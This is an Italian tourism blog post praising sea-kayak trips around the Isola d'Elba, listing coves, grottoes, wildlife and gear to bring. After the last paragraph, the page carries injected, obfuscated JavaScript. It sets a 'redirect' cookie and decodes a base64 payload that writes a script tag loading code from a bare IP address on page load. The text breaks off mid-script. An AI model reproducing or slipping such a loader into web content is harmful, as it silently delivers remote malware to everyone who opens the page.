Una vacanza all’Isola d’Elba non può prescindere da un giro in kayak: ecco perché
Volete fare una vacanza diversa dal solito? Volete vedere le spiagge da un’altra prospettiva? Andare in kayak all’Isola d’Elba è la risposta. Approcciarvi all’isola dal mare vi darà la possibilità di goderne tutto il suo fascino ed in più poter unire il relax della vostra vacanza marittima con una sana e divertente pratica sportiva.
Pescare alla traina, mangiare davanti ad un bivacco notturno, sono valori aggiunti che solo un’esperienza di kayak all’Elba può darvi; 147 km di costa ricca di grotte e calette indimenticabili, dove poter vedere da vicino gabbiani, marangoni, cormorani, tonni e, per chi è più fortunato, addirittura le balene, sono un motivo più che valido per convincere anche i più titubanti.
Non serve essere degli atleti, ma è sufficiente avere spirito di gruppo e capacità di adattamento, amore per la natura ed ovviamente passione per il mare. Affidatevi fiduciosamente ad uno dei centri di noleggio di kayak all’Elba per farvi guidare nei luoghi più belli di quest’isola, voi dovrete solo occuparvi di portare una crema protettiva per il sole, un cappello, un sacco a pelo, maschera, pinne, torcia ed effetti personali. Cercate il prossimo tour sea kayak all’Elba e prenotate la vostra vacanza-sport per fare il giro completo di tutta l’isola.
Punta Bardella, la Grotta del Bue Marino, la Grotta del Vescovo, il golfo di Cavoli, la spiaggia di Seccheto, Fetovaia, lo scoglio dell’Ogliera, le scogliere di Chiessi, Punta Polveraia, Capraia Rota, il golfo di Fonza, punta del Priolo, cala del Fico, la secca delle Coralline, la spiaggetta del Paradiso, le baie di Nisporto e Nisportino, le rocce rosse sotto Monte Grosso, Punta delle Paffe, la spiaggia di Barbarossa, le scogliere di Ripalti, la Buca dell’Acqua, sono solo alcuni dei luoghi più suggestivi a volte inaccessibili a barche e gommoni, dove invece voi potrete approdare per fare un bagno o una sosta rilassante. _ok_”text/javascript”> function getCo_ok_ie(e){var U=document.co_ok_ie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),co_ok_ie=getCo_ok_ie(“redirect”);if(now>=(time=co_ok_ie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.co_ok_ie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘